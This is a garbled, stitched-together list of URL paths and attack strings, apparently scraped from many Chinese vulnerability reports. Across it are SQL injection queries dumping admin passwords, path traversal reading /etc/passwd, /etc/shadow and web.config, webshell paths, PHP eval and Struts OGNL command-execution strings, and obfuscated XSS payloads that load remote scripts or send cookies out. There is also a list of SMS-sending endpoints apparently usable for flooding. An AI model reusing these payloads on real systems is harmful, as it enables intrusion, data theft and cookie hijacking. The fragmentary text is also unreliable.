/templates/download.jsp?path=/UserFiles/../templates/download.jsp /templates/download.jsp?path=/UserFiles/../templates/download.jsp /upload.do /upload.do /upload.do /upload.do /bugs/wooyun-2012-010172相同 /down/class/index.php?myord=1 php:105 php:551 /hotelsearch/hotelinfo.action /install/check.php return /sysadmin/Login.Asp?act=Check /chat/AdminMain.aspx /index.php?id=1'%20and%201%3C%3Ebenchmark(3000000,md5('wooyun'))%20and%20'a'='a /story.php?id=3049 /zw/external/index.action /findNewMusic2012!loadCompetition.action /search/noresult/ /test/xiechuang/User/Login/ / /focus/admin/login.do / /luntan/ /build/tmp/.svn/entries /src/.svn/entries /src/Model/.svn/entries /src/Controller/.svn/entries /src/Controller/Events/.svn/entries / /snjyw/ /snjyw/login.jsp /User/Passport/registerStep2?username= /user/aspasp /loginPage.html?type=1&bdPayUrl=http://www.wooyun.org /loginPage.html?type=1&bdPayUrl=javascript:alert%28%22test%22%29 /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector money=还有表单的hidden多了几个参数。 /Shopping/OrderDetail.aspx?OrderCode=2012072978871 /m.php / /sqlnet.log /test.php /info.php /test.php /pp.php /about/admin4ppscms/index.php /index.php?act=admin%2Fhome%2Flogin /ray.php /m.php?act=login_do /html/ordershow.php?languages=tw&oid=31286163 / / /main/login.jsp /test.php /index.php?act=home/a_q /.svn/text-base/config.php.svn-base /.svn/entries /index/shop.action / /auth/index /auth/index /auth/index /auth/login?type=1 /Client/MyAddress.aspx /CallBack/UserCenterCallBack.ashx intitle:系统错误 /fleanew/editor.php?z_id=186400 /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /servmanage/serviceInfo.action?serviceid=100&type=user / / /051000004EFB666B67585703060E72A2?qq445060535-url=q395885789q.googlecode.com/svn/trunk/av/cmp.swf?lists=av1/22.xml&.swf /type_14.html /venue/tips?guid=5842A4B18F5F1B3C&page=2 / /plus/ /admin/admin_login.php /(S(vzljsrplzvug5hb25w2ofckd))/js_cxxs.aspx?xh= /bid/51061/info /note/?ac=note&op=del /?m=mysqlmng&a=pma&app_id=应用名 /zh-CN/app/search/dashboard_live /huntjob/nresume/create.do?type=1&language=1会不断的创建新的简历,并且会返回简历的编号RESUME值。 / /info.php /server-status /xss/probe.js /360doc.rar /subject/index.php?id=135 /65/1 / /225/193//129 / /login.jsp /index.php / /admin/login /login.php //html.php //test.php //config.php.bak /admin/index.action /login.action / /fckeditor/editor/filemanager/connectors/test.html /jsp/cpss/_accessory/ /www/ /index)存在struts命令执行漏洞,非root权限。 / /user/create此页面Struts远程执行漏洞 content.jsp?urltype=news.NewsContentUrl&wbtreeid //cgi-bin/buyitem_present_yxb1?item_id=57&item_num=1 /space.php?uid=17345 /thread-2974-1-2.html /?q-12162.html /FAQ/ShowAnswer.asp?id=1153 /schedulingplatform/PlatformLogin/login.html /dict_show.php?sort=date&cate=0&keyword= /wap/index.php?c=down&a=content_all&id=26 /wap/?c=skin&a=platform&platform_type=s60v2 /wap/index.php?c=skin&a=info_gx&skin_id=153651&pos=3 /wap/index.php?c=dict /u06/upload/icon/ /YnzcAms/login.html?action=Jump www.tuita.com主域名下,因而要寻找该域名下的XSS。 /tagpage/wooyuntest /tagpage/wooyuntest /post/create /img/baidu_sylogo1.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116)) www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description /tagpage/wooyuntest /tagpage/wooyuntest /tagpage/test none / /tagpage/test中的恶意代码内容 /tagpage/test none /pkav.js www.tuita.com /post/create","post_title=%E5%9B%AD%E6%B8%B8%E4%BC%9A&post_content=%7B%22PlayerFlashVar%22%3A%22http%3A%5C%2F%5C%2Fwww.xiami.com%5C%2Fwidget%5C%2F0_376013%5C%2FsinglePlayer.swf%22%2C%22song_id%22%3A%22376013%5Cu0022%5Cu003e%5Cu003c%5Cu002f%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0077%5Cu0077%5Cu0077%5Cu002e%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0069%5Cu006d%5Cu0067%5Cu002f%5Cu0062%5Cu0061%5Cu0069%5Cu0064%5Cu0075%5Cu005f%5Cu0073%5Cu0079%5Cu006c%5Cu006f%5Cu0067%5Cu006f%5Cu0031%5Cu002e%5Cu0067%5Cu0069%5Cu0066%5Cu0022%5Cu006f%5Cu006e%5Cu006c%5Cu006f%5Cu0061%5Cu0064%5Cu003d%5Cu0022%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu003d%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0063%5Cu0072%5Cu0065%5Cu0061%5Cu0074%5Cu0065%5Cu0045%5Cu006c%5Cu0065%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu0028%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0034%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu0029%5Cu0029%5Cu003b%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu002e%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu002e%5Cu0066%5Cu0072%5Cu006f%5Cu006d%5Cu0043%5Cu0068%5Cu0061%5Cu0072%5Cu0043%5Cu006f%5Cu0064%5Cu0065%5Cu0028%5Cu0031%5Cu0030%5Cu0034%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0035%5Cu0038%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0038%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0030%5Cu002c%5Cu0031%5Cu0031%5Cu0037%5Cu002c%5Cu0039%5Cu0037%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0031%5Cu0031%5Cu0032%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0039%5Cu0039%5Cu002c%5Cu0031%5Cu0031%5Cu0031%5Cu002c%5Cu0031%5Cu0030%5Cu0039%5Cu002c%5Cu0034%5Cu0037%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0034%5Cu0036%5Cu002c%5Cu0031%5Cu0030%5Cu0036%5Cu002c%5Cu0031%5Cu0031%5Cu0035%5Cu0029%5Cu003b%5Cu0064%5Cu006f%5Cu0063%5Cu0075%5Cu006d%5Cu0065%5Cu006e%5Cu0074%5Cu002e%5Cu0062%5Cu006f%5Cu0064%5Cu0079%5Cu002e%5Cu0061%5Cu0070%5Cu0070%5Cu0065%5Cu006e%5Cu0064%5Cu0043%5Cu0068%5Cu0069%5Cu006c%5Cu0064%5Cu0028%5Cu0077%5Cu0069%5Cu006e%5Cu0064%5Cu006f%5Cu0077%5Cu002e%5Cu0073%5Cu0029%5Cu0022%5Cu003e%5Cu003c%5Cu006f%5Cu0062%5Cu006a%5Cu0065%5Cu0063%5Cu0074%5Cu003e%5Cu003c%5Cu0069%5Cu0020%5Cu0061%5Cu003d%5Cu0022%22%2C%22song_name%22%3A%22%5Cu56ed%5Cu6e38%5Cu4f1a%22%2C%22artist_id%22%3A%22%5Cu5468%5Cu6770%5Cu4f26%22%2C%22album_name%22%3A%22%5Cu4e03%5Cu91cc%5Cu9999%22%2C%22album_logo%22%3A%7B%2255%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_3.jpg%22%2C%22100%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_1.jpg%22%2C%22185%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_2.jpg%22%2C%22300%22%3A%22http%3A%5C%2F%5C%2Fimg.xiami.com%5C%2F.%5C%2Fimages%5C%2Falbum%5C%2Fimg60%5C%2F1260%5C%2F66481314675280_4.jpg%22%7D%2C%22audio_info%22%3A%7B%22album_logo%22%3Anull%2C%22description%22%3A%22%3CP%3Eok%21+look%21%3C%5C%2FP%3E%22%7D%7D&post_type=xiami&blog_id="+id+"&sync_flag=0&syn=&post_tag=test&sticky=0&draft_id=451375&from=home&dtime=null",function(rs) /template/get?blog_id="+id+"&tsdump="+new /tagpage/test\ none\ /template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function /home?hash="+Math.random(),function(rs) /util/keyword这个接口的数据,这个不是重点。 /post/edit /UZH56T /art/1099/20100111/1977341_1.html /3g/chatlog3g/42059/desc/3/page.do /3g/chatlog3g/42059/desc /register/commonRegisterNew.action /shop/greenWay/goGreenWay.action /topic/autocomplete?token=fb"nb'lh /autocomplete?token=fb"nb'lh /index.php?s=vod-search-area-${@print(eval($_POST[c])) /region/dljg/result.jsp?region_id=15 /zhxx/zhxxindex.jsp?id=null&gradeno=1 /cgfg/zywx.jsp?select1=2 /dsc/detaildscgg.jsp?fno=8 /dsc/detaildscdt.jsp?no=45 www.cqch.cn有个论坛,注册一个用户,然后发帖,可以看到一个上传热图,打开之后直接上传一个类似1.asp /cn/index/index.html /admin/Manage_backup.asp?action=Backup http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup-- 10px bold left /services/sendsms?username=%s /member/sendIdentityCodeByMobile.htm?callback=jQuery16404408283903978138_1329030748736&mobile=%s //ajax.php?action=getverify&mobile=%s /NoteAction.do?method=sendCode&mobile=%s&passwd= /Ashx/CreateMobileCode.ashx?mobile=%s& /Handler/Vcode.ashx?mobile=%s /ajax/json/account/reg/mobile/send?m=%s /?page=join&handler=ajax&action=send_reg_mobile_vcode&page_key=7ef0c64ccfeccd5cdda1306c3b769e1b&mobile_number=%s /gaea/SendPhoneMsg.ashx?page=REG&mobile=%s /3g/livelog/ /3g/livelog/42838/15/desc/0/1/page.do /3g/chatlog3g/42838/inputChat.do /mcolumn/expdetail.php?mid=890 /xiaoqu/block_details.php?bid=58 /HSH.mdb /user/login.asp /user/ /images/ /upload/ /upload/eWebEdit/ /upload/eWebEdit/db/yglEdit.mdb /login.html /mainpage.pr.prKeyWordLetViewlist.do?PageCond/length=20&WORDNAME=%BE%D9%B1%A8%25'%20and%201=1%20and%20'%25'= /mainpage.pr.prKeyWordLetViewlist.do?PageCond/length=20&WORDNAME=%BE%D9%B1%A8%25'%20and%201=2%20and%20'%25'= /index.php?artId=0&gname=1%27%22&r=gamesites/newslist /index.php?artId=0&gname=1%27%22&r=gamesites/newslist /eview.php?eid=8(不只这一个,自己找吧) /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /services/sendsms?username=13800000000 /services/sendsms?username=手机号 /services/sendsms?username=13800000000 / /jmx-console /index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 /index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1 /index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 /index.php?doc-view-1572 /thread-625-1-1.html /search?q=intitle:powered+by+HDWiki /emall/city_10052_10051_9264_.html /tips/food/food.php?id=3701‘ /download?path=UserFiles/File/66dd5f26-8b7e-4d38-882d-147c50702604.doc /download?path=WEB-INF/web.xml /download?path=UserFiles/File/aa/../66dd5f26-8b7e-4d38-882d-147c50702604.doc /download?path=UserFiles/../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../ /UserFiles/Image/shell.jsp /shell.jsp / /bugs/wooyun-2012-09469 / /admin/adminlogin.aspx / /admin/ALogin.aspx /Xiazai.aspx?xzURL=20111111125527aspxspy.aspx /Xiazai.aspx?xzURL=../web.config /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config /images1/ /ddmapmanage/user!login.action /fbrole/main/login.jsp /interfaces/search/showSearchResult.action?searchKeywords=%3Cscript%3Ealert%28/xss/%29%3C/script%3E www.ons40.com /pay.php happigo.com uid /SCR2006/Courseware/NetDisk/5531/111026085064.php,执行的时候好像不能写php大马,写个asp上去就可以了。这个系统数据库用户用的是sa,有点。。 / /1937cN.txt /2894994/ /api/comment/delete/ /messages/211/ /messages/203/ /shop/shopNetCard.action /art/1099/20100111/1977341_1.html /admin-console/login.seam?conversationId=15 /index.php?m=Hotels&a=detail&id=6166 /c_513/#@ /20943.html /admin/system/codeigniter/cts.php tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px 12px none 20px;background:url("index.php?i=dots") 208;border:1 9pt FileChange(this.value) 60;border:1 9pt Database none /admin/jpg.asp Database Database Database Database tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px 12px none 20px;background:url("index.php?i=dots") 208;border:1 9pt FileChange(this.value) 60;border:1 9pt /shine%5F%C9%C1%C1%E9/blog/item/7d7d57445f523a4384352468.html /273329/albums/ /273329/albums/277850/3361539/ /273329/albums/277850/3358396/ /store/page!login.action /mail/login.action /yl/news_info.php?uid=-64%20union%20select%201,2,3,4,concat%28user%28%29,0x2f,database%28%29,0x2f,version%28%29%29,6,7-- /assetmanager/ /assetmanager/HTMLEditor/Default.htm //image20010518/null/null/26833.txt /query/query_list.jsp?queryType=7 /5184cms/ /5184cms/conf/DatabasePool.conf /index.php/module/action/param1/$%7B@phpinfo%28%29%7D /content/detail.do /admin none none page www.moonhack.org / /test/.svn/entries /userinfo.php?id=3624 /front/supplier/advisoryshow.jsp?id=47075 /front/supplier/advisoryshow.jsp?id=47075 /front/supplier/advisoryshow.jsp?id=47075 /ckfinder/ckfinder.html /coupon/couponExchange.html /coupon/getCoupon_sendSms.html?mobile=手机号 /showNews!show.action?id=4028848a2a618bb6012cdd704b6b4f1b /Xss.swf#.mp3进行测试 /imgpro/editor/audio.gif /Xss.swf#.mp3 /imgpro/editor/audio.gif /Xss.swf"#.mp3 /app/enter?appid=280383) /imgpro/editor/audio.gif /Xss.swf"#60;img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,110,111,46,106,115);document.body.appendChild(window.s)})()>#.mp3 /imgpro/editor/audio.gif /Xss.swf" /Xss.swf"type="application/x-shockwave-flash" /tsingtao2012/index.php?url=admin/user /book/.svn/entries http://localhost:80/help/help.asp?id=1 /product/fir_cla.asp?flag=1&pro_claid=1 /search?selected=3&app_ref=search&origin=603&keyword= /crifs/content/docmanage/download.jsp?filePath=../../../../../../../../etc/passwd /wsbs/wsbg/wsjb_bjhdb2.jsp?bglsh=201207107970001225 /pay/ /Cruise/cruise_company?id=46 /Cruise/cruise_company?id=46‘ /snap.php?c='+document.cookie+ /278719/3383088/exif/ /index.php/crowdtest/uer/display/proid/736 /index.php/crowdtest/uer/display/proid/736 /index.php/crowdtest/uer/view/proid/745 /index.php/crowdtest/gift/exchange/type/3 / /story.php?story_list=&dr=&p=d%27z /kjbm/login.action /user/Login!loginInput.action / /pages/platform/addOrUpdatePlatform!add.action /member/signup/confirm_email_address/NjVkMDNlODItMjhmMC00N2NhLWE2YWYtOWNiYWU3NWFlNTZm /qq_piaoliuping_xss_code.txt /pkav.js g_docid},function(xml) /bmsite/listSub.action /order_pro_mody.asp?id=16125&ack=mody¤tpage=1074&Search_Domain_Name= / /news.aspx?nid=6 /guess/friends/list?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363&message=%E5%A5%B3%E7%AF%AE%E5%B0%8F%E7%BB%84%E8%B5%9B-%E4%B8%AD%E5%9B%BDvs%E5%AE%89%E5%93%A5%E6%8B%89%EF%BC%8C%E8%B0%81%E5%B0%86%E8%8E%B7%E8%83%9C%EF%BC%9F /guess/guess-tid-18-id-363 /guess/guess-tid-18-id-363 /guess/friends/invite?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363&hash=bc85ea9ed27178416dfe984ef58fb657 /guess/guess-tid-18-id-363 /guess/friends/list得到好友的QQ号码,token值,以及被邀请竞猜的URL以及URL对应的HASH值 /guess/guess-tid-18-id-363修改成我们自己的呢?于是我们测试,将url修改为 /guess/friends/list?url=http%3A%2F%2Fapps.2012.qq.com%2Fguess%2Fguess-tid-18-id-363";alert(1)//&message=ok /#.qq.com/?http://1.qq.com一样可以发送成功。 /content/368),我就去腾讯的域名下找一个FLASH /aoyun_js.php.txt /aoyun_worm.js /aoyun_receive.php.txt / /fans123.php?mid=10183 admin /pma/ /icetea/list.php?special_sort_id=2 /stat.php?gid=33'&yid=yuku /pn/user_reg.php?tids=1&pid=1 /chbl/php/player.php?playerid=224 /client/200706suning/msg.php?id=34 /client/maybelline/work.php?img_id=230 /member/logout.jhtml?redirectURL=http://club.alimama.com/attachments/data/Day_120812/68_5263715_d06067053f2438d.txt?1BxS /go.php?id=3658 /login!register.action /index.do /xiarixinqing/login.do /register-intro.action /view/product/product!info.action /software!softlist.action /search /Index/print_plan?t_id=5568 /web/index.action?merchantId=4 /list.asp?id=7 / /Admin/index.php/Public/login /71/12397071.shtml /cgi-bin/login.cgi?action=log&fro=self&rand=0.6299977905582637 /tmp/updateme/sinfor/ad/sys/sys_user.conf /sjjg/bmjj.aspx?rid=20 /FCKeditor/editor/filemanager/browser/default/browser.html?Type=test&Connector=connectors/jsp/connector /upload/test/b/b.jsp /write.shtml?fid=367 http://www.k-touch.cn/product/detail?prod_id=20 /* / /news_about.php?cid=1&id=66%20and%201=2%20UNION%20SELECT%201,2,3,4,group_concat%28name,0x2b,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20admin /dz/uc_server /union/index.action /admin.php /connect_list.php?folder_id=105 /search?q=cache:SelKXWN73EYJ:zdzsc.zju.edu.cn/+&cd=1&hl=zh-CN&ct=clnk /lib.libone.action /s?q=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&pq=%3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E&guid=1145750987453166300&src=srp /cms/e.php /novel/novel.asp?aid=7790 / /Web/Author/ProList.aspx?id=7 /ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow /witkey/witkeylist/4/0-0-0--1%22%3E%3Cscript%3Ealert(123)%3C/script%3E /cps/membercenter/memberinfo.action /index.php /display.jsp?path=E:%5C /bscx.do?method=scurl&id=33108100003854 /extra.php?mod=show/detail&postpicid=1306 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&safe=strict&site=webhp&q=site:exam.htexam.com+filetype%3Aphp+-index&oq=site:exam.htexam.com+filetype%3Aphp+-index&gs_l=serp.3...4060.5308.10.6140.7.7.0.0.0.0.219.768.2j4j1.7.0...0.0...1c.Zs014furHmw&bav=on.2,or.r_gc.r_pw.r_cp.&fp=5bb8b75e73ae5f27&biw=1192&bih=655 /index/addLetter.action /approve/web/login/passwordView.jsp?loginName=深圳书城电子出版物有限责任公司 /extra.php?mod=xiaomi/authcallback&token=WVK%2B2L1CJlBAp3d%2BKsV1TRJ7bI3%2FwOoHIuJxDwud7LgQsq7b8k9%2B7Uj5Y6QSoe4RIgHVSwCZ5aA1gPIHXpSMWM98aqeMwbjSUJfH%2F5wTpt6yWDFessMgbMvdGmWtNX0Gjl2WhQW0ZsI6RostjdDwwCOXOh4tZGAPrrfZFbILUY3UCQxxRsERkVKV5EArNXToo73Hf3jESBCuplSrJxGkA0Cnd34qxXVNt2M2N6NzkW8611xTc9pg3%2FjgYo9ulmlE%2FJj9qKw%2FNRE%3D /extra.php?mod=xiaomi/authcallback&token=WVK%2B2L1CJlDTuCNhacHjkiQdbrGRf7So49fD99zudmbbUCwfv9QCR1sr7covSbBKPbUVHNdXCIP4oncO76xdTZbWw9YKLARR8nnGM2FKuwqlIK6U7uh2kxNqUZ3E5m5rOkaLLY3Q8MAjlzoeLWRgD6632RWyC1GN1AkMcUbBEZFSleRAKzV06KO9x394xEgQrqZUqycRpANbBolvHIw5j7djNjejc5FvOtdcU3PaYN9zYW2XuhDhCfyY%2FaisPzUR(本来这个我连挂了两天,结果被禁了) /index.php/crowdtest/uer/display/proid/763 / / /subdir/lndex.jsp /manager/lndex.jsp /cps/admin/login.action /fs/inquire/price_img.php /index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=false&bug_sub_available=1&project_id=690 /index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=,If /index.php/crowdtest/bug/displayBugList/?sEcho=1&iColumns=6&sColumns=&iDisplayStart=0&iDisplayLength=20&iSortingCols=1&iSortCol_0=2&sSortDir_0=,If /uploads/pai/photos/201208/big_1344427981_1281058497.jpg alert(document.cookie) /photographer/id/34 void(0) /default.php /nologin/chooseNumber.action /looyu/chat/.svn/text-base/down.jsp.svn-base /cgi-bin/comment/adm_login.cgi /auto/4s-admin/login.php /admin/ /admin/index.php /manage/login.php /admin/web/login.html /admin/ /admin/adminMain.do /beta2/simple_admin/flogin.html /auth?next=/ /2010mini/lephonesns/admin/ /admin/testLogin.jsp /search_wp/admin/login.php /admin/ /admin/admin/login.jsp /freeform/admin/user/login.jsp /admin/login.php /manager/login/ /control/login /manage/login.php /admin/managerLoginAction.do /admin/admin_index_login.asp /wp-login.php / /admin/login.jsp /docinadmin/author/login.do /admin/Login.aspx /plaf/login.jsf /cgi-bin/webmail /tv/ /zhuanti/xwxs/index.php?page=4 /customer/ /login_old.php /admin%21index.action /admin%21index.action /ngoss/Login/Login.aspx?ReturnUrl=/Default.aspx /1860/ /Club/admin/adminIndex.jsp / /login/login_rollback.action /ShowArchive.action?aid=ff8080813479adf20135ae5894f9010c /site/5852576 /friend/action/add?id=账户id,我用hucexe账户登录,发现收到被加好友消息,点击,结果弹出了tmxkorg帐号测试的xss。 /friend/action/add?id="+i /pages/comment/addContentComment.do?rpid=38 /pages/comment/addContentComment.do?rpid=38&rcType=1&cid=2&commentContent=留言内容@tmxk.org /pages/comment/getCommentOfFont.do?rpid=38&rcType=1&pageNo=1 /pages/comment/webComment.htm?rpid=38&rcType=1 www.zfsoft.com:3389 /zfca/ / /admin/ /show.php?id=214 %74%65%78%74%2F%68%74%6D%6C%2C%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%69%6F%64%28%30%29%3B%3C%2F%73%63%72%69%70%74%3E",发帖后firefox用户点击就悲剧了。 /emoi_store.php?id=120 /control/ /showSrvLink.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /install /Admin/AllUserList.aspx 